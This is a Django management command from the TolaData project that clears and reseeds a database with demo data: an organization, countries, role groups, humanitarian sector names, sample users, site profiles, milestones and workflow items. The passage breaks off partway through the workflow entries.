code
stringlengths 733
1.05M
|
---|
# -*- coding: utf-8 -*-
from cStringIO import StringIO
import json
import logging
import os
from urlparse import urljoin
from django.conf import settings
from django.contrib.sites.models import Site
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.core.management import call_command
from django.core.management.base import BaseCommand
from django.db import transaction, IntegrityError, connection
import requests
import factories
from indicators.models import (Level, Frequency, Indicator, PeriodicTarget,
CollectedData, SiteProfile)
from workflow.models import (
ROLE_VIEW_ONLY, ROLE_ORGANIZATION_ADMIN, ROLE_PROGRAM_ADMIN,
ROLE_PROGRAM_TEAM, Organization, Country, TolaUser, Group, Sector,
Stakeholder, Milestone, WorkflowLevel1, WorkflowLevel2,
WorkflowLevel1Sector, WorkflowTeam, Internationalization)
logger = logging.getLogger(__name__)
DEFAULT_WORKFLOW_LEVEL_1S = [ # tuple (id, name)
(3, 'Humanitarian Response to the Syrian Crisis'),
(6, u'Bildung für sozial benachteiligte Kinder in Deutschland'),
]
DEFAULT_ORG = {
'id': 1,
'name': settings.DEFAULT_ORG,
'oauth_domains': settings.DEFAULT_OAUTH_DOMAINS.split(',')
}
DEFAULT_COUNTRY_CODES = ('DE', 'SY')
class Command(BaseCommand):
help="""
Loads initial factories data.
By default, a new default organization will be created, plus countries,
groups, sectors and indicator types.
Passing a --demo flag will populate the database with extra sample projects,
activities, indicators, workflowteams etc. As a pre-condition for it to
work, all affected tables except organization, countries, groups and sectors
should be empty. Otherwise the command will exit with an error and no
new data will be added to the database.
"""
APPS = ('workflow', 'formlibrary', 'search')
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
# Note: for the lists we fill the first element with an empty value for
# development readability (id == position).
self._organization = None
self._groups = ['']
self._country_germany = None
self._country_syria = None
self._sectors = ['']
self._tolauser_andrew = None
self._users = []
self._tolauser_ninette = None
self._site_profiles = ['']
self._workflowlevel1s = ['']
self._workflowlevel2s = ['']
self._levels = ['']
self._frequencies = ['']
self._indicators = ['']
def _clear_database(self):
"""
Clears all old data except:
- Default organization
- Default countries
- Current registered users
Before everything happens, current registered users will be reassigned
to the default organization and to have residency in Germany.
"""
# Check integrity
try:
organization = Organization.objects.get(**DEFAULT_ORG)
except Organization.DoesNotExist:
msg = ("Error: the default organization could not be found in the "
"database. Maybe you are restoring without having run the "
"command a first time?")
logger.error(msg)
self.stderr.write("{}\n".format(msg))
raise IntegrityError(msg)
try:
country = Country.objects.get(code=DEFAULT_COUNTRY_CODES[0])
Country.objects.get(code=DEFAULT_COUNTRY_CODES[1])
except Country.DoesNotExist:
msg = ("Error: one or both of the default countries %s could not "
"be found in the database. Maybe you are restoring without "
"having run the command a first time?".format(
DEFAULT_COUNTRY_CODES))
logger.error(msg)
self.stderr.write("{}\n".format(msg))
raise IntegrityError(msg)
# Reassign organization and country for current registered users
TolaUser.objects.all().update(organization=organization,
country=country)
# Delete data - Kill 'Em All!
Organization.objects.exclude(id=DEFAULT_ORG['id']).delete()
Group.objects.all().delete()
Country.objects.exclude(code__in=DEFAULT_COUNTRY_CODES).delete()
Sector.objects.all().delete()
SiteProfile.history.all().delete()
SiteProfile.objects.all().delete()
Stakeholder.objects.all().delete()
Milestone.objects.all().delete()
WorkflowLevel1.objects.all().delete()
WorkflowLevel2.history.all().delete()
WorkflowLevel2.objects.all().delete()
Level.objects.all().delete()
Frequency.objects.all().delete()
Indicator.history.all().delete()
Indicator.objects.all().delete()
PeriodicTarget.objects.all().delete()
CollectedData.history.all().delete()
CollectedData.objects.all().delete()
WorkflowLevel1Sector.objects.all().delete()
WorkflowTeam.objects.all().delete()
Internationalization.objects.all().delete()
def _create_organization(self):
try:
self._organization = Organization.objects.get(**DEFAULT_ORG)
except Organization.DoesNotExist:
self._organization = factories.Organization(
id=DEFAULT_ORG['id'],
name=DEFAULT_ORG['name'],
organization_url="http://toladata.com",
level_2_label="Project",
level_3_label="Activity",
level_4_label="Component",
oauth_domains=DEFAULT_ORG['oauth_domains'],
)
def _create_site(self):
site = Site.objects.get(id=1)
site.domain='toladata.io'
site.name = 'API'
site.save()
factories.TolaSites(site=get_current_site(None))
def _create_groups(self):
self._groups.append(factories.Group(
id=1,
name=ROLE_VIEW_ONLY,
))
self._groups.append(factories.Group(
id=2,
name=ROLE_ORGANIZATION_ADMIN,
))
self._groups.append(factories.Group(
id=3,
name=ROLE_PROGRAM_ADMIN,
))
self._groups.append(factories.Group(
id=4,
name=ROLE_PROGRAM_TEAM,
))
def _create_countries(self):
factories.Country(
country="Afghanistan",
code="AF",
latitude="34.5333",
longitude="69.1333",
)
factories.Country(
country="Pakistan",
code="PK",
latitude="33.6667",
longitude="73.1667",
)
factories.Country(
country="Jordan",
code="JO",
latitude="31.9500",
longitude="35.9333",
)
factories.Country(
country="Lebanon",
code="LB",
latitude="33.9000",
longitude="35.5333",
)
factories.Country(
country="Ethiopia",
code="ET",
latitude="9.0167",
longitude="38.7500",
)
factories.Country(
country="Timor-Leste",
code="TL",
latitude="-8.3",
longitude="125.5667",
)
factories.Country(
country="Kenya",
code="KE",
latitude="-1.2833",
longitude="36.8167",
)
factories.Country(
country="Iraq",
code="IQ",
latitude="33.3333",
longitude="44.4333",
)
factories.Country(
country="Nepal",
code="NP",
latitude="26.5333",
longitude="86.7333",
)
factories.Country(
country="Mali",
code="ML",
latitude="17.6500",
longitude="0.0000",
)
factories.Country(
country="United States",
code="US",
latitude="45",
longitude="-120",
)
factories.Country(
country="Turkey",
code="TR",
latitude="39.9167",
longitude="32.8333",
)
self._country_syria = factories.Country(
country="Syrian Arab Republic",
code="SY",
latitude="33.5000",
longitude="36.3000",
)
factories.Country(
country="China",
code="CN",
)
factories.Country(
country="India",
code="IN",
)
factories.Country(
country="Indonesia",
code="ID",
)
factories.Country(
country="Mongolia",
code="MN",
)
factories.Country(
country="Myanmar",
code="MY",
latitude="21.9162",
longitude="95.9560",
)
factories.Country(
country="Palestine",
code="PS",
latitude="31.3547",
longitude="34.3088",
)
factories.Country(
country="South Sudan",
code="SS",
latitude="6.8770",
longitude="31.3070",
)
factories.Country(
country="Uganda",
code="UG",
latitude="1.3733",
longitude="32.2903",
)
self._country_germany = factories.Country(
country="Germany",
code="DE",
latitude="51.1657",
longitude="10.4515",
)
def _create_sectors(self):
self._sectors.append(factories.Sector(
id="1", # 129"
sector="Agriculture",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="2", # 131"
sector="Agribusiness",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="3", # 132"
sector="Fisheries",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="4", # 133"
sector="Basic Needs",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="5", # 134"
sector="Basic Health Care",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="6", # 135"
sector="Basic Health Infrastructure",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="7", # 136"
sector="Basic Nutrition",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="8", # 137"
sector="Basic Life Skills For Youth",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="9", # 138"
sector="Basic Drinking Water Supply And Basic Sanitation",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="10", # 139"
sector="Basic Sanitation",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="11", # 140
sector="Basic Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="12", # 141
sector="Capacity development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="13", # 142
sector="Child Health & Nutrition",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="14", # 143
sector="Emergency Response",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="15", # 144
sector="Climate Change Adaptation & Disaster Risk Reduction",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="16", # 145
sector="Climate Change Adaptation",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="17", # 146
sector="Disaster Risk Reduction",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="18", # 147
sector="Resilience",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="19", # 148
sector="Conflict Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="20", # 149
sector="Peacebuilding",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="21", # 150
sector="Conflict Prevention And Resolution",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="22", # 151
sector="Early Recovery",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="23", # 152
sector="Economic Recovery and Livelihoods",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="24", # 153
sector="Basic Infrastructure Restoration",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="25", # 154
sector="Economic and Market Development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="26", # 155
sector="Private Sector Development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="27", # 156
sector="Employment Opportunities",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="28", # 157
sector="Livelihood Improvement",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="29", # 158
sector="Enterprise Development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="30", # 159
sector="Entrepreneurship",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="31", # 160
sector="Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="32", # 161
sector="Primary Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="33", # 162
sector="Secondary Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="34", # 163
sector="Post-Secondary Education",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="35", # 164
sector="Vocational Training",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="36", # 165
sector="Informal Education/Life skills",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="37", # 166
sector="Shelter",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="38", # 167
sector="Non-food Items (NFI)",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="39", # 168
sector="Fuel/Energy",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="40", # 169
sector="Social Support",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="41", # 170
sector="Information Dissemination",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="42", # 171
sector="Energy",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="43", # 172
sector="Access to Electricity",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="44", # 173
sector="Access to Clean Cooking Facilities",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="45", # 174
sector="Energy Efficiency",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="46", # 175
sector="Renewable Energy",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="47", # 176
sector="Financial services",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="48", # 177
sector="Financial Services",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="49", # 178
sector="Financial Inclusion",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="50", # 179
sector="Cash for Work",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="51", # 180
sector="Food Security",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="52", # 181
sector="Food Assistance",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="53", # 182
sector="Food Access",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="54", # 183
sector="Food Availability",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="55", # 184
sector="Agriculture and Livestock",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="56", # 185
sector="Gender",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="57", # 186
sector="Governance",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="58", # 187
sector="Democratic Participation And Civil Society",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="59", # 188
sector="Education Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="60", # 189
sector="Water Sector Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="61", # 190
sector="Fishing Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="62", # 191
sector="Agricultural Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="63", # 192
sector="Health Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="64", # 193
sector="Population Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="65", # 194
sector="Public Sector Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="66", # 195
sector="Social Protection And Welfare Services Policy, Planning And Administration",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="67", # 196
sector="Employment Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="68", # 197
sector="Housing Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="69", # 198
sector="Transport Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="70", # 199
sector="Communications Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="71", # 200
sector="Energy Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="72", # 201
sector="Financial Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="73", # 202
sector="Rural Land Policy And Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="74", # 203
sector="Urban Land Policy And Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="75", # 204
sector="Environmental Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="76", # 205
sector="Tourism Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="77", # 206
sector="Trade Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="78", # 207
sector="Construction Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="79", # 208
sector="Mineral/Mining Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="80", # 209
sector="Industrial Policy And Administrative Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="81", # 210
sector="Health",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="82", # 211
sector="General Clinical Services",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="83", # 212
sector="Maternal Health and Newborn Care",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="84", # 213
sector="Child Healh",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="85", # 214
sector="Sexual Violence",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="86", # 215
sector="Psychosocial support",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="87", # 216
sector="Infectious Diseases",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="88", # 217
sector="Human rights",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="89", # 218
sector="Information Dissemination and Knowledge Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="90", # 219
sector="Infrastructure",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="91", # 220
sector="Water supply Infrastructure",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="92", # 221
sector="Natural Resource Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="93", # 222
sector="Water Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="94", # 223
sector="Land Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="95", # 224
sector="Nutrition",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="96", # 225
sector="Infant Feeding",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="97", # 226
sector="Protection",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="98", # 227
sector="Child Protection",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="99", # 228
sector="Gender-Based Violence",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="100", # 229
sector="Housing Land and Property",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="101", # 230
sector="Water, Sanitation, and Hygiene (WASH)",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="102", # 231
sector="Water Supply",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="103", # 232
sector="Hygiene Promotion",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="104", # 233
sector="Excreta Disposal",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="105", # 234
sector="Solid Waste Management",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="106", # 235
sector="Youth Development",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="107", # 236
sector="Malnutrition Prevention",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="108", # 237
sector="Micronutrient Deficiency Prevention",
organization=self._organization,
))
self._sectors.append(factories.Sector(
id="109",
sector="Children's Rights",
organization=self._organization,
))
def _create_indicator_types(self):
factories.IndicatorType(
id=1,
indicator_type="Custom",
organization=self._organization,
)
factories.IndicatorType(
id=2,
indicator_type="Donor",
organization=self._organization,
)
factories.IndicatorType(
id=3,
indicator_type="Standard",
organization=self._organization,
)
def _create_users(self):
self._tolauser_andrew = factories.TolaUser(
# id=9
name="Andrew Ham",
user=factories.User(first_name="Andrew", last_name="Ham"),
organization=self._organization,
country=self._country_germany,
)
self._tolauser_ninette = factories.TolaUser(
# id=11
name="Ninette Dedikari",
user=factories.User(first_name="Ninette", last_name="Dedikari"),
organization=self._organization,
country=self._country_germany,
)
def _create_site_profiles(self):
self._site_profiles.append(factories.SiteProfile(
id=1, # 5
name="Medical Center 1 - Damascus",
country=self._country_syria, # 14
latitude="33.500",
longitude="36.300",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=2, # 6
name="Medical Center 2 - Aleppo",
country=self._country_syria, # 14
latitude="36.2130824982",
longitude="37.1569335937",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=3, # 7
name="Medical Center 3 - Hamma",
country=self._country_syria, # 14
latitude="35.1421960686",
longitude="36.7504394531",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=4, # 8,
name="Medical Center 4 - Tartus",
country=self._country_syria, # 14
latitude="34.8959",
longitude="35.8867",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=5, # 9
name="Medical Center 5 - Homs",
country=self._country_syria, # 14
latitude="34.7369225399",
longitude="36.7284667969",
created_by=self._tolauser_ninette.user, # 11
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=6,
name="Paul Schule",
country=self._country_germany,
latitude="50.9692657293000000",
longitude="6.9889383750000000",
created_by=self._tolauser_ninette.user,
organization=self._organization,
))
self._site_profiles.append(factories.SiteProfile(
id=7,
name="Peter Schule",
country=self._country_germany,
latitude="49.4507464458000000",
longitude="11.0319071250000000",
created_by=self._tolauser_ninette.user,
organization=self._organization,
))
def _create_stakeholders(self):
factories.Stakeholder(
id=1, # 2
name="Municipal Government Official",
role="Bulk Transport Services",
country=self._country_syria, # 14
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
def _create_milestones(self):
factories.Milestone(
id="1",
name="1. Identification and Design",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="2",
name="2. Setup and Planning",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="3",
name="3. Implementation",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="4",
name="4. Close Out",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="5",
name=u"Auswahl Schulen",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="6",
name=u"Durchführung Ideen Workshops",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="7",
name=u"Familien Fortbildungen",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
factories.Milestone(
id="8",
name=u"Qualifizierung Lehrer",
milestone_start_date="2017-07-01T10:00:00Z", # TODO
milestone_end_date="2018-05-11T10:00:00Z", # TODO
organization=self._organization,
created_by=self._tolauser_ninette.user, # 11
)
def _create_workflow_1s(self):
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=1, # 10
name='Financial Assistance and Building Resilience in Conflict Areas',
funding_status="Funded",
organization=self._organization,
description="<p>Build resilience among affected communities through improving access to finance</p>",
country=[],
start_date="2017-07-01T10:00:00Z", # TODO use current date?
end_date="2019-06-30T10:00:00Z", # TODO +2y?
user_access=[self._tolauser_andrew], # 9
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=2, # 11
name='Population Health Initiative',
organization=self._organization,
description="<p>Build resilience among affected communities through improving access to finance</p>",
country=[],
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
user_access=[self._tolauser_ninette], # 11
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=3, # 15
name='Humanitarian Response to the Syrian Crisis',
funding_status="Funded",
organization=self._organization,
description="<p>Newly funded program</p>",
country=[self._country_syria], # 14
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
milestone=[1, 2, 3, 4],
user_access=[self._tolauser_andrew], # 9
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=4, # 18
name='Institutional Learning Initiative',
organization=self._organization,
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=5, # 19
name='Building resilience in Mali',
organization=self._organization,
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
))
self._workflowlevel1s.append(factories.WorkflowLevel1(
id=6,
name=u'Bildung für sozial benachteiligte Kinder in Deutschland',
organization=self._organization,
start_date="2017-07-01T10:00:00Z", # TODO
end_date="2019-06-30T10:00:00Z", # TODO
milestone=[5, 6, 7, 8],
))
def _create_workflow_2s(self):
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=1, # 2
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=0,
name='Planning: How to map out a project',
expected_start_date="2018-01-01T11:00:00Z", # TODO
expected_end_date="2018-01-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=2, # 3
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Determine the real problem to solve',
expected_start_date="2018-01-15T11:00:00Z", # TODO
expected_end_date="2018-01-19T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=3, # 4
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Identify Stakeholders',
expected_start_date="2017-12-20T11:00:00Z", # TODO
expected_end_date="2018-01-26T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=4, # 5
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Define project objectives',
expected_start_date="2018-01-01T11:00:00Z", # TODO
expected_end_date="2018-01-05T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=5, # 6
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Determine scope, resources and major tasks',
expected_start_date="2018-01-08T11:00:00Z", # TODO
expected_end_date="2018-01-12T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=6, # 7
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=1, # 2
name='Prepare for trade-offs',
expected_start_date="2018-01-29T11:00:00Z", # TODO
expected_end_date="2018-01-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=7, # 8
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=0,
name='Build-up: How to get the project started',
expected_start_date="2017-11-01T11:00:00Z", # TODO
expected_end_date="2017-12-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
site=[self._site_profiles[1], self._site_profiles[2], self._site_profiles[3], self._site_profiles[4], self._site_profiles[5]], # [5, 6, 7, 8, 9]
stakeholder=[1], # 2
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=8, # 9
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Assemble your team',
expected_start_date="2017-11-01T11:00:00Z", # TODO
expected_end_date="2017-11-10T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=9, # 10
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Plan assignments',
expected_start_date="2017-12-01T11:00:00Z", # TODO
expected_end_date="2017-12-08T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=10, # 11
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Create the schedule',
expected_start_date="2017-11-13T11:00:00Z", # TODO
expected_end_date="2017-11-17T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=11, # 12
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Hold a kickoff meeting',
expected_start_date="2017-11-27T11:00:00Z", # TODO
expected_end_date="2017-11-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=12, # 13
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=7, # 8
name='Develop a budget',
expected_start_date="2017-11-20T11:00:00Z", # TODO
expected_end_date="2017-11-24T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=13, # 14
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=0,
name='Implementation: How to execute the project',
expected_start_date="2018-02-01T11:00:00Z", # TODO
expected_end_date="2018-08-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=14, # 15
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=13, # 14
name='Monitor and control procress and budget',
expected_start_date="2018-04-02T11:00:00Z", # TODO
expected_end_date="2018-08-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=15, # 16
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=13, # 14
name='Report progress',
expected_start_date="2018-06-01T11:00:00Z", # TODO
expected_end_date="2018-08-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=16, # 17
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=13, # 14
name='Hold weekly team meetings',
description="<p>Weekly meetings held every Monday</p>",
expected_start_date="2018-02-01T11:00:00Z", # TODO
expected_end_date="2018-04-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=17, # 18
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=13, # 14
name='Manage problems',
expected_start_date="2018-02-01T11:00:00Z", # TODO
expected_end_date="2018-08-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=18, # 19
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=0,
name='Closeout: How to handle end matters',
expected_start_date="2018-09-01T11:00:00Z", # TODO
expected_end_date="2018-10-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=19, # 20
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=18, # 19
name='Evaluate project performance',
expected_start_date="2018-10-15T11:00:00Z", # TODO
